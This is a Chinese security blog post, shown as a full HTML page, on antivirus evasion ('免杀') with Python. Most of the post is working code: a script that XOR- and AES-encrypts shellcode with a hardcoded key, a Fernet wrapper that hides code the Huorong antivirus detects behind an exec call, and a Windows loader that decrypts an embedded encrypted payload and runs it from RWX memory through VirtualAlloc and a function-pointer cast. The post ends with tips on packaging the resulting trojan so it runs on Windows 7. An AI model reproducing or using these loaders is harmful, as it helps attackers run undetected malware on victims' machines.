<!DOCTYPE html>
<html lang="zh-cn">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/wan1/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/wan1/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/wan1/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/wan1/images/logo.svg" color="#222">

<link rel="stylesheet" href="/wan1/css/main.css">


<link rel="stylesheet" href="/wan1/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"wanheiqiyihu.gitee.io","root":"/wan1/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="免杀学习-python代码分析缝合分析下市面上的两个个工具，站在巨人的肩膀上 这是一个加密的脚本，可以将对应的数据XOR加密和AES加密，用于加密shellcode（bese64编码后的bin文件） 1234567891011121314151617181920212223242526import base64from Crypto.Cipher import AESdef add_to_16(s">
<meta property="og:type" content="article">
<meta property="og:title" content="免杀学习-python代码分析缝合">
<meta property="og:url" content="https://wanheiqiyihu.gitee.io/wan1/2022/10/07/%E5%85%8D%E6%9D%80%E5%AD%A6%E4%B9%A0-python%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%E7%BC%9D%E5%90%88/index.html">
<meta property="og:site_name" content="十三の博客">
<meta property="og:description" content="免杀学习-python代码分析缝合分析下市面上的两个个工具，站在巨人的肩膀上 这是一个加密的脚本，可以将对应的数据XOR加密和AES加密，用于加密shellcode（bese64编码后的bin文件） 1234567891011121314151617181920212223242526import base64from Crypto.Cipher import AESdef add_to_16(s">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-10-07T11:13:53.000Z">
<meta property="article:modified_time" content="2022-11-12T06:44:32.000Z">
<meta property="article:author" content="十三">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://wanheiqiyihu.gitee.io/wan1/2022/10/07/%E5%85%8D%E6%9D%80%E5%AD%A6%E4%B9%A0-python%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%E7%BC%9D%E5%90%88/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-cn'
  };
</script>

  <title>免杀学习-python代码分析缝合 | 十三の博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/wan1/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">十三の博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/wan1/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/wan1/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-ctf做题笔记">

    <a href="/wan1/categories/Experience" rel="section"><i class="download fa-fw"></i>CTF做题笔记</a>

  </li>
        <li class="menu-item menu-item-python">

    <a href="/wan1/categories/python" rel="section"><i class="download fa-fw"></i>python</a>

  </li>
        <li class="menu-item menu-item-java">

    <a href="/wan1/categories/java" rel="section"><i class="download fa-fw"></i>java</a>

  </li>
        <li class="menu-item menu-item-读书笔记">

    <a href="/wan1/categories/readbook" rel="section"><i class="download fa-fw"></i>读书笔记</a>

  </li>
        <li class="menu-item menu-item-渗透测试">

    <a href="/wan1/categories/penetration" rel="section"><i class="download fa-fw"></i>渗透测试</a>

  </li>
        <li class="menu-item menu-item-基础">

    <a href="/wan1/categories/basic" rel="section"><i class="download fa-fw"></i>基础</a>

  </li>
        <li class="menu-item menu-item-轮子">

    <a href="/wan1/categories/lunzi" rel="section"><i class="download fa-fw"></i>轮子</a>

  </li>
        <li class="menu-item menu-item-漏洞库">

    <a href="/wan1/categories/fuxian" rel="section"><i class="download fa-fw"></i>漏洞库</a>

  </li>
        <li class="menu-item menu-item-工具">

    <a href="/wan1/categories/tools" rel="section"><i class="download fa-fw"></i>工具</a>

  </li>
        <li class="menu-item menu-item-代码审计">

    <a href="/wan1/categories/daima" rel="section"><i class="download fa-fw"></i>代码审计</a>

  </li>
        <li class="menu-item menu-item-逆向">

    <a href="/wan1/categories/nixiang" rel="section"><i class="download fa-fw"></i>逆向</a>

  </li>
        <li class="menu-item menu-item-应急响应">

    <a href="/wan1/categories/yingji" rel="section"><i class="download fa-fw"></i>应急响应</a>

  </li>
        <li class="menu-item menu-item-免杀">

    <a href="/wan1/categories/miansha" rel="section"><i class="download fa-fw"></i>免杀</a>

  </li>
        <li class="menu-item menu-item-靶场">

    <a href="/wan1/categories/bachang" rel="section"><i class="download fa-fw"></i>靶场</a>

  </li>
        <li class="menu-item menu-item-cve申请">

    <a href="/wan1/categories/cve" rel="section"><i class="download fa-fw"></i>cve申请</a>

  </li>
        <li class="menu-item menu-item-c语言">

    <a href="/wan1/categories/c" rel="section"><i class="download fa-fw"></i>c语言</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-cn">
    <link itemprop="mainEntityOfPage" href="https://wanheiqiyihu.gitee.io/wan1/2022/10/07/%E5%85%8D%E6%9D%80%E5%AD%A6%E4%B9%A0-python%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%E7%BC%9D%E5%90%88/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/wan1/images/avatar.gif">
      <meta itemprop="name" content="十三">
      <meta itemprop="description" content="潜心学习，不骄不躁">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="十三の博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          免杀学习-python代码分析缝合
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-10-07 19:13:53" itemprop="dateCreated datePublished" datetime="2022-10-07T19:13:53+08:00">2022-10-07</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-11-12 14:44:32" itemprop="dateModified" datetime="2022-11-12T14:44:32+08:00">2022-11-12</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/wan1/categories/miansha/" itemprop="url" rel="index"><span itemprop="name">-miansha</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="免杀学习-python代码分析缝合"><a href="#免杀学习-python代码分析缝合" class="headerlink" title="免杀学习-python代码分析缝合"></a>免杀学习-python代码分析缝合</h1><p>分析下市面上的两个个工具，站在巨人的肩膀上</p>
<p>这是一个加密的脚本，可以将对应的数据XOR加密和AES加密，用于加密shellcode（bese64编码后的bin文件）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add_to_16</span>(<span class="params">s</span>):</span></span><br><span class="line">        <span class="keyword">while</span> <span class="built_in">len</span>(s) % <span class="number">16</span> != <span class="number">0</span>:</span><br><span class="line">            s += <span class="string">&#x27;\0&#x27;</span></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">str</span>.encode(s)  <span class="comment"># 返回bytes</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">aes_jiami</span>(<span class="params">text</span>):</span></span><br><span class="line">    <span class="comment"># 密钥长度必须为16、24或32位，分别对应AES-128、AES-192和AES-256</span></span><br><span class="line">    key = <span class="string">&#x27;LeslieCheungKwok&#x27;</span></span><br><span class="line">    aes = AES.new(add_to_16(key), AES.MODE_ECB)</span><br><span class="line">    encrypted_text = <span class="built_in">str</span>(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding=<span class="string">&#x27;utf8&#x27;</span>).replace(<span class="string">&#x27;\n&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> encrypted_text</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">xor_jiami</span>(<span class="params">s,key</span>):</span></span><br><span class="line">    xor_s = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">        xor_s += <span class="built_in">chr</span>(<span class="built_in">ord</span>(i) ^ key)</span><br><span class="line">    <span class="keyword">return</span> xor_s</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    sc = <span class="string">&#x27;shellcode&#x27;</span><span class="comment">#读取shellcode</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;./aes-xor.txt&#x27;</span>,<span class="string">&#x27;w&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        f.write(aes_jiami(xor_jiami(sc,<span class="number">35</span>)))</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#用fernet加密代码的脚本</span></span><br><span class="line"><span class="keyword">from</span> cryptography.fernet <span class="keyword">import</span> Fernet</span><br><span class="line"></span><br><span class="line"><span class="comment">#被火绒ban掉的代码</span></span><br><span class="line">ban_code=[<span class="string">b&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">xxxxxxxxx</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">           ]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> code <span class="keyword">in</span> ban_code:</span><br><span class="line">   key =Fernet.generate_key()</span><br><span class="line">   f =Fernet(key)</span><br><span class="line">   enc_pay =f.encrypt(<span class="built_in">bytes</span>(code))</span><br><span class="line">   output_key =<span class="string">&quot;key= &#123;0&#125;&quot;</span>.<span class="built_in">format</span>(key)</span><br><span class="line">   <span class="built_in">print</span>(output_key)</span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&quot;f_obj= Fernet(key)&quot;</span>)</span><br><span class="line">   output_enc_pay =<span class="string">&quot;enc_pay= &#123;0&#125;&quot;</span>.<span class="built_in">format</span>(enc_pay)</span><br><span class="line">   <span class="built_in">print</span>(output_enc_pay)</span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&quot;exec(f_obj.decrypt(enc_pay))&quot;</span>)</span><br><span class="line">   <span class="built_in">print</span>(<span class="string">&quot;========================================&quot;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://pyob.oxyry.com/">Oxyry Python Obfuscator - The most reliable python obfuscator in the world</a></p>
<p>python代码混淆网址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#加载器</span></span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"></span><br><span class="line">kernel32 = ctypes.windll.kernel32</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">aes_jiemi</span>(<span class="params">s</span>):</span></span><br><span class="line">    cipher = AES.new(<span class="string">b&#x27;LeslieCheungKwok&#x27;</span>, AES.MODE_ECB)</span><br><span class="line">    <span class="keyword">return</span> cipher.decrypt(base64.decodebytes(<span class="built_in">bytes</span>(s, encoding=<span class="string">&#x27;utf8&#x27;</span>))).rstrip(<span class="string">b&#x27;\0&#x27;</span>).decode(<span class="string">&quot;utf8&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">xor_jiemi</span>(<span class="params">s,key</span>):</span></span><br><span class="line">    xor_s = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">        xor_s += <span class="built_in">chr</span>(<span class="built_in">ord</span>(i) ^ key)</span><br><span class="line">    <span class="keyword">return</span> xor_s</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write_memory</span>(<span class="params">buf</span>):</span></span><br><span class="line">    length = <span class="built_in">len</span>(buf)</span><br><span class="line"></span><br><span class="line">    kernel32.VirtualAlloc.restype = ctypes.c_void_p</span><br><span class="line">    ptr = kernel32.VirtualAlloc(<span class="literal">None</span>, length, <span class="number">0x3000</span>, <span class="number">0x40</span>)</span><br><span class="line"></span><br><span class="line">    kernel32.RtlMoveMemory.argtypes = (</span><br><span class="line">        ctypes.c_void_p,</span><br><span class="line">        ctypes.c_void_p,</span><br><span class="line">        ctypes.c_size_t)</span><br><span class="line">    kernel32.RtlMoveMemory(ptr, buf, length)</span><br><span class="line">    <span class="keyword">return</span> ptr</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">run</span>(<span class="params">shellcode</span>):</span></span><br><span class="line">    buf = ctypes.create_string_buffer(shellcode)</span><br><span class="line">    ptr = write_memory(buf)</span><br><span class="line">    shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(<span class="literal">None</span>))</span><br><span class="line">    shell_func()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    jiami_sc = <span class="string">&#x27;nNTTwqBntRUVsGzFLXrB54mHCTMUkwOkgFGxbYPdb6zG2uKaUEKY4lK2dT36BaJQ9jZJ4rPVx5n0xGteS5M1f5r/hc9ab2ZAUcUipd/87CD/Vmns9lpZCaj8Cr1BXdsEpO56xJtpurJ9tbar8S+4VIX6cQ2bJefummMWD2tv8upIx8UtZigMvqryLrrQ6RN7Hab87ezQV9t9qtMBhKm2No3LA3mX/oYGWl88CBuMCqEEyntbFMKhbi8PXXDt+GvamHgmSlTPn+M54tLfoAbxy6L/MDId2TX+BrTjrbO53TNJODdgBl7Jn2SH2/ucg7VZpOoscbRSePFQo/+iCp4gqJn9h/alCY85EXuYti/14W7C41f0KSZfp0zPE5fI3lykyHWPVkZoX+LmdDg43pIybdaUgI/G1YLE9rK6o+9cBgr+BrQiehHpvl5Id8N6pKgilMIenPEwlCzEalny0uhKFVT6Kl9idOQZmds1kqLT0nyvem0lt+tffq3+a1ioGWGKybinrDOArR4P0GQrCjsoOAVWZlvuXceM7aZX1aGHEnfMNg7WQb1zfWRp3HCp1bKZ8IP+Fp3fKhpxNiHYAaGMqfBcZbIex1O6O6eg+xnNJ3TzOnQfhvfSMhtt3nzDe8OS5f1PtiMUUnOlXP8uYDlPDL6ZJxEIboziy9YdjsX0bM4A3FrDVlenTpK2wbWlOJnLEoxO7a6093Z6ILY3n201WNJR2bzvNFmBlRD0SvKPJpcB6nAR2pHjra27MNAqYq4oFingkte1G6UZBb2A3n3DyI2DgH9agOO1d4T1p0nYac4B2a/v+9NwmK1C4aQw1lOpqvQuyNS8OyFnGHZMmOkS+aYCR2bLc6vNrMVG7ys553D1mpKgi4vKvowXI/u0GoI/lSL9ehSAoMFaUdoieft2JpzVPRr1aF7JK5OAc6vnzLVASlnKCJb6Pj6MknFDJTruaW&#x27;</span></span><br><span class="line">    sc = xor_jiemi(aes_jiemi(jiami_sc),<span class="number">35</span>)</span><br><span class="line">    shde = base64.b64decode(sc)</span><br><span class="line">    run(shde)</span><br></pre></td></tr></table></figure>

<p>最后编译main就可</p>
<p>这套免杀就是base64+xor+aes最后代码混淆+fernet</p>
<p>最后我改了下里面的加密方式以及一些小东西，缝合了一套自己的免杀，源码我就在这不放了，免得用不了多久就没了。</p>
<p>最后说下踩的一个坑吧，win10打包的马在win7没法用怎么办，在win7装一个python32，然后在win7打包就行了，这样哪里都能运行，注意win7装python需要安装一个插件 KB976932补丁。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/wan1/2022/10/02/dll%E5%8A%AB%E6%8C%81%E6%8A%80%E6%9C%AF%E5%85%A5%E9%97%A8%E5%8F%8A%E5%AE%9E%E8%B7%B5/" rel="prev" title="dll劫持技术入门及实践">
      <i class="fa fa-chevron-left"></i> dll劫持技术入门及实践
    </a></div>
      <div class="post-nav-item">
    <a href="/wan1/2022/10/09/%E7%BB%95%E7%81%AB%E7%BB%92%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7/" rel="next" title="绕火绒添加用户">
      绕火绒添加用户 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%85%8D%E6%9D%80%E5%AD%A6%E4%B9%A0-python%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90%E7%BC%9D%E5%90%88"><span class="nav-number">1.</span> <span class="nav-text">免杀学习-python代码分析缝合</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="十三"
      src="/wan1/images/avatar.gif">
  <p class="site-author-name" itemprop="name">十三</p>
  <div class="site-description" itemprop="description">潜心学习，不骄不躁</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/wan1/archives/">
        
          <span class="site-state-item-count">172</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">十三</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/wan1/lib/anime.min.js"></script>
  <script src="/wan1/lib/velocity/velocity.min.js"></script>
  <script src="/wan1/lib/velocity/velocity.ui.min.js"></script>

<script src="/wan1/js/utils.js"></script>

<script src="/wan1/js/motion.js"></script>


<script src="/wan1/js/schemes/pisces.js"></script>


<script src="/wan1/js/next-boot.js"></script>




  




  
<script src="/wan1/js/local-search.js"></script>













  

  

<script src="/wan1/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"live2d-widget-model-tsumiki"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
